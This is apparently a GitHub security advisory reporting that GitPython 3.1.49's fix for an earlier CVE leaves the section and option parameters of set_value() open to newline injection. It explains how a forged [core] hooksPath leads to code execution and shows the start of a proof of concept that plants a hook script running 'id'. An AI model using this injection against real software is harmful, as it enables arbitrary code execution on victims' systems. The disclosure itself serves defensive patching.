GHSA-mv93-w799-cj2w: GitPython: Newline injection in config_writer() section parameter bypasses CVE-2026-42215 patch, enabling RCE via core.hooksPath

Summary

The patch for CVE-2026-42215 (GitPython 3.1.49) validates newlines only in the value parameter of set_value(). The section and option parameters are passed to configparser without any newline validation. An attacker who controls the section argument can inject \n to write arbitrary section headers into .git/config, including a forged [core] section with hooksPath pointing to an attacker-controlled directory, leading to RCE when any git hook is triggered.

Details

File: git/config.py — GitPython 3.1.49 (latest patched version)

def set_value(self, section: str, option: str, value) -> "GitConfigParser":
value_str = self._value_to_string_safe(value)   # only value is validated
if not self.has_section(section):
self.add_section(section)                    # section not validated
super().set(section, option, value_str)          # option not validated
return self

_write() formats section headers as “[%s]\n” % name. When section = “user]\n[core”, this writes [user]\n[core]\n — two valid section headers — into .git/config.

PoC

import git, os, subprocess

repo = git.Repo.init("/tmp/bypass_test")

os.makedirs("/tmp/evil_hooks", exist_ok=True)
with open("/tmp/evil_hooks/pre-commit", "w") as f:
f.write("#!/bin/sh\nid > /tmp/rce_proof.txt\n")
os.chmod("/tmp/evil_hooks/pre-commit", 0o755)